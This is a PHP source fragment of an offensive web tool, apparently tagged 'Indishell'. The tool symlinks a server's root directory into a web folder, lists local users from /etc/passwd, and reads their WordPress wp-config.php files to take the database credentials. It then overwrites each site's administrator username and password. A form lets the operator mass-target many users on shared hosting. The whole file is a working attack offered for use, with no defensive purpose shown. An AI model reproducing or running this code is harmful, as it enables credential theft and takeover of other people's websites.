$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
symlink("/","Indishell/root");
if(!is_dir('Indishell/root'))
{
echo "sorry bhai ji , script could not symlink / folder :( ";
}
else
{
$cmd="awk -F : '($3>500) && ($3!=65534) && ($3!=1000)' /etc/passwd | cut -f 1 -d ':' ";
$c=shell_exec($cmd);
$usr=explode("\n",$c);
foreach($usr as $us )
{
$u=trim($us);
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
$confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);
if($uurl && preg_match('/DB_NAME/i',$uurl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);
$uname=$_POST['uname'];
$dbu=entre2v2($text,"define('DB_USER', '","');");
$dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
$dbn=entre2v2($text,"define('DB_NAME', '","');");
$tp=entre2v2($text,"$table_prefix = '","'");
$npwd= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";
$ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo "website is ".$data["option_value"];
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
}
}
?>
<?php
if(isset($_GET['particular']))
{
?>
<font size=3 color=white face="comic sans ms">Put the wordpress website usernames for mass user/password change<br></font>
<form method=post>
<font size=3 color=white face="comic sans ms"> username:<input type=text name=uname value=Team><br>
Password<input type=text name=pass value=INDISHELL></font><br>
<font color=red size=3 face="comic sans ms">user list<br><textarea rows=6 cols=45 name=wen></textarea>
<br><br><input type=submit name=cant value="bhaiyu.... click me and i will try to hex this shit XD" /></form><p>
<?php
}
?>
<?php
if(isset($_POST['cant']))
{
error_reporting(0);
$uname=$_POST['uname'];
$pass=$_POST['pass'];
$users=$_POST['wen'];
mkdir('Indishell',0777);
$rr = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$g = fopen('Indishell/.htaccess','w');
fwrite($g,$rr);
symlink("/","Indishell/root");
$use=explode("\n",$users);
foreach($use as $us){
$u=trim($us);
echo "<font color=red size=3 face=\"comic sans ms\">".$u;
$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/Indishell/root/home/';
$confi=array("wp-config.php","blog/wp-config.php","wordpress/wp-login.php");
foreach($confi as $co)
{
$uurl=@file_get_contents($base_url.$u."/public_html/".$co);
if($uurl && preg_match('/DB_NAME/i',$uurl))
{
echo "<div align=center><table width=60% ><tr><td align=center><font color=red size=4 face='comic sans ms'> website cms is wordpress of user $u </font></td></tr></table>";
$wl=$base_url.$u."/public_html/".$co;
$text=file_get_contents($wl);
$uname=$_POST['uname'];
$dbu=entre2v2($text,"define('DB_USER', '","');");
$dbp=entre2v2($text,"define('DB_PASSWORD', '","');");
$dbn=entre2v2($text,"define('DB_NAME', '","');");
$tp=entre2v2($text,"$table_prefix = '","'");
$npwd= md5($pass);
$host="localhost";
$dbconnect=@ mysql_connect($host,$dbu,$dbp);
$dbselect=@ mysql_select_db($dbn,$dbconnect);
if($dbselect)
{
echo "<font color=red>database $dbn has been selected<br>";
$ru=@ mysql_query("UPDATE `".$tp."users` SET `user_login` ='".$uname."' WHERE ID = 1") ;
$ru= @ mysql_query("UPDATE `".$tp."users` SET `user_pass` ='".$npwd."' WHERE ID = 1") ;
$req =mysql_query("SELECT * from `".$tp."options` WHERE option_name='home'");
$data = mysql_fetch_array($req);
$site_url=$data["option_value"];
echo "website is ".$data["option_value"];
if(!$ru)
{
echo "<font size=2 color=red face='comic sans ms'><br>could not update username/password :P</font>";
}
else {
echo "<div align=center><table width=60% boorder=1><tr><td align=center><font size=3 color=red face='comic sans ms'>bhai ji,username $uname and password $pass has been updated for ID=1 :D</font></td></tr></table><br>";
}
}
}
}
}
}
?>